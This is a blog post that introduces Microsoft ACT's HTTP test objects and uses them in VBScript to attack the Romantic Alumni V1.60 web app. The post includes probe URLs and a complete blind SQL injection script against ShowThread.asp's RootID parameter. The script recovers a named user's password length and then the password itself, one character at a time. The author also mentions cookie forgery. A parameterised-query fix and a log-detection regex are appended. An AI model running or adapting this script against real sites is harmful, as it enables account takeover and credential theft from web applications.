Source: http://www.viphot.com/
Last night I was idly browsing through a VBS script on my machine and noticed an object I had not seen before: Test.SendRequest("http://" & G_sServer & "/testfiles/browser.asp"). The object was unfamiliar, but its meaning was obvious: it sends an HTTP request. I first assumed it was the WMI Script API, but I could not find the statement that created the object. Then I remembered Microsoft ACT, a tool in Visual Studio .NET for testing web sites (Long, is this useful in the future? If not, how do you look at this?), which I had opened before but never studied. So I opened the help file (MSDN has it at Ms-help://ms.Vscc/ms.msdnvs.2052/act/htm/actml_main.htm) and skimmed it. Unexpectedly, it is a complete set of HTTP client objects (I am not sure whether that description is accurate). The objects and their members are listed below; this is the Test object model. There is also a Creator object model; if you are interested, see MSDN. I am still learning:
- Connection object
  Close method
  Send method
  IsOpen property
  Port property
  RedirectDepth property
  Server property
  UseSSL property
- Cookie object   // since the tool tests sites by simulating many users from a script, this lets you set each user's cookie, which also means it can be used for tampering, hehe
  Expires property
  Name property
  Path property
  Value property
- Cookies object
  Add method
  Remove method
  RemoveAll method
  Count property
  Item property
- Header object
  Name property
  Value property
- Request object
  Body property
  CodePage property
  EncodeBody property
  EncodeQueryAsUTF8 property
  Headers property
  HTTPVersion property
  Path property
  ResponseBufferSize property
  Verb property
- Response object
  Body property   // gets the text of the HTTP response; returns only the body part of the response buffer
  CodePage property
  BytesRecv property
  BytesSent property
  ContentLength property
  Headers property
  HeaderSize property
  HTTPVersion property
  Path property
  Port property
  ResultCode property   // the HTTP status code
  Server property
  TTFB property
  TTLB property
  UseSSL property
- Test object
  CreateConnection method
  CreateRequest method
  GetCurrentUser method
  GetGlobalIndex method
  GetGlobalVariable method
  GetNextUser method
  IncrementGlobalIndex method
  SendRequest method
  SetGlobalIndex method
  SetGlobalVariable method
  Sleep method
  Trace method
  TraceLevel property
- User object
  Cookies property
  Name property
  Password property
At this point you can probably think of many uses: testing a site, testing a server, testing a program, cookie forgery ... it depends on your imagination. What interested me first was the line I started with, Test.SendRequest("http://" & G_sServer & "/testfiles/browser.asp"). The description of the Test object's SendRequest method:
oResponse = Test.SendRequest(strURL)
Parameter: strURL As String: the requested URL
Return value: oResponse As Response: an object representing the web server's response to the request (the Response object listed above)
This object makes it easy to write attack programs against port 80 in VBS, such as the snow-tracing function or the now popular SQL injection. Most SQL injection tools on the net are written in Perl; I do not know Perl, and writing a complete socket program in C is rather cumbersome. This object gives VBS that possibility, and the program is quite simple. Efficiency is sacrificed, but for rookies like us it is a good approach. Here is an example to illustrate:
Romantic Alumni is a free ASP alumni-directory program. You may not have heard of it, but among free alumni web programs it is considered excellent, so many sites use it either as-is or modified (I have seen my high school's alumni site running a rewritten version of it). I have V1.60, which I downloaded from the internet last year. I am writing this in my dorm room without network access, so I cannot get the latest version; anyway, it is just an example, so let's use it, hehe. Skimming the code, I found many places that can be injected. The most obvious one (because it is visible on the home page) is the forum-style message board, ShowThread.asp:
...
TopicID = Request("RootID")
SQL = "Select Topic,Hits from BBS where ParentID=0 and BBSID=" & TopicID
Set Rs = Conn.Execute(SQL)
...
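A hardened form of that lookup, as an added example that is not part of the Romantic Alumni code: RootID is validated as a plain integer and then bound as a typed ADODB.Command parameter instead of being concatenated into the SQL text. It assumes conn is the page's already-open ADODB.Connection.

```vbscript
' Hardened ShowThread.asp lookup (added example; conn is assumed to be an open ADODB.Connection)
Const adInteger = 3
Const adParamInput = 1
Const adCmdText = 1

Dim topicid, cmd, rs, re
topicid = Trim(Request("RootID"))

' RootID must be a plain non-negative integer; anything else (e.g. "7 and 1=1") is rejected before it reaches SQL
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(topicid) Then
    Response.Write "Invalid RootID"
    Response.End
End If

' Bind the value as an integer parameter; the statement text never changes with user input
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT Topic, Hits FROM BBS WHERE ParentID = 0 AND BBSID = ?"
cmd.Parameters.Append cmd.CreateParameter("bbsid", adInteger, adParamInput, , CLng(topicid))
Set rs = cmd.Execute
```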
A very old and classic one, hehe. Try it:
http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=1
http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=2
I know the table structure, and user names can be seen in the user list, so this example shows how to guess a password. What? Too easy? It is just an example, don't laugh ~~ Writing it was not plain sailing ~~ It is written very poorly; in particular, once the right character is detected the loop should exit, but I could not think of how to quit (Break? Exit?). Still, for the passwords stored in the program it is enough: a 6-character password took about 15 seconds to guess. Improvements would help a lot, but the efficiency can never match Perl.
To use this object you must install Microsoft ACT, a tool in Visual Studio .NET; I failed to register the associated DLL directly with regsvr32 on another machine, so it still has to be installed.
'*********************************************
' Romantic Alumni V1.60 vulnerability test script by Luoluo
' Note: you need to install the ACT tool in Visual Studio .NET
'*********************************************
' ********************************** optimized, higher efficiency
Option Explicit
On Error Resume Next
Dim Test
Dim o_response
Dim wrong
Dim i, j, k
Dim pwd_len
Dim pwd
Dim strings
Dim username
' The user name to crack, taken from the command line
If WScript.Arguments.Count > 0 Then
    username = WScript.Arguments(0)
Else
    username = "Luoluo"
End If
WScript.Echo "Start probing, please wait ..."
' Marker text from the "true" page; picked arbitrarily, it only needs to be a piece that differs between the two returned pages
wrong = "Luoluoisachinesehacker"
' Stores the password
pwd = ""
' Character range of the password
strings = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
' Set up the object
Set Test = CreateObject("ACT.Test")
' Length of the user's password
For i = 0 To 128 Step 1
    ' Send a request and get back a Response object; the URL is split into segments with & so it is easier to read
    Set o_response = Test.SendRequest("http://192.168.101.16/txl/ShowThread.asp?" & _
        "RootID=7%20and%20exists%20(Select%20userid%20from%20student%20where%20len(userpwd)='" & i & "'" & _
        "%20and%20userid='" & username & "')")
    ' If the returned page contains the marker, the length is right
    If InStr(o_response.Body, wrong) <> 0 Then
        pwd_len = i
        Exit For
    End If
Next
' Guess the user's password
For j = 1 To pwd_len Step 1
    For k = 1 To Len(strings) Step 1
        Set o_response = Test.SendRequest("http://192.168.101.16/txl/ShowThread.asp?" & _
            "RootID=7%20and%20exists%20(Select%20userid%20from%20student%20where%20left(userpwd," & j & ")='" & pwd & Mid(strings, k, 1) & "'" & _
            "%20and%20userid='" & username & "')")
        If InStr(o_response.Body, wrong) <> 0 Then
            pwd = pwd & Mid(strings, k, 1)
            Exit For
        End If
    Next
Next
If Err Then
    WScript.Echo "Error: " & Err.Description
    Err.Clear
Else
    ' Output the password
    WScript.Echo "Password: " & pwd
End If
Set Test = Nothing
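From the server side, the probing above leaves a very recognisable trail: a burst of requests to the same page whose query string carries "and 1=1" / "and 1=2" or "and exists(select". The following added example (not part of the original post) runs a pattern over constructed IIS W3C log lines, whose field layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is assumed, and counts probe-style requests per client address.

```vbscript
Option Explicit
' Added example: flag boolean-blind SQL injection probes in IIS log lines.
' The lines below are constructed for this example; assumed layout:
' date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
Dim logLines, re, line, fields, key, perClient
logLines = Array( _
    "2003-05-01 10:00:01 192.168.101.20 GET /txl/ShowThread.asp RootID=7 200", _
    "2003-05-01 10:00:02 192.168.101.20 GET /txl/ShowThread.asp RootID=7%20and%201=1 200", _
    "2003-05-01 10:00:03 192.168.101.20 GET /txl/ShowThread.asp RootID=7%20and%201=2 200", _
    "2003-05-01 10:00:05 192.168.101.20 GET /txl/ShowThread.asp RootID=7%20and%20exists%20(Select%20userid%20from%20student%20where%20len(userpwd)='6'%20and%20userid='Luoluo') 200", _
    "2003-05-01 10:00:09 192.168.101.30 GET /txl/ShowThread.asp RootID=12 200")

' Matches " and 1=1" / " and 1=2" tautology pairs and " and exists(select" subqueries
' in the query string, whether the space was logged as %20, + or a literal blank
Set re = New RegExp
re.IgnoreCase = True
re.Pattern = "(%20|\+| )and(%20|\+| )+(1=[12]|exists(%20|\+| )*\(\s*select)"

' Count matching requests per client address (c-ip is field 2 in the assumed layout)
Set perClient = CreateObject("Scripting.Dictionary")
For Each line In logLines
    fields = Split(line, " ")
    If UBound(fields) >= 5 Then
        If re.Test(fields(5)) Then
            key = fields(2)
            If perClient.Exists(key) Then
                perClient(key) = perClient(key) + 1
            Else
                perClient.Add key, 1
            End If
        End If
    End If
Next

' With the sample above this reports only 192.168.101.20, with 3 probe-style requests
For Each key In perClient.Keys
    WScript.Echo key & ": " & perClient(key) & " probe-style requests to ShowThread.asp"
Next
```

A single tautology pair from one address within a few seconds is the signature worth alerting on; a long run of exists(select ... len(...)) / left(...) requests is the length-then-character guessing loop in progress.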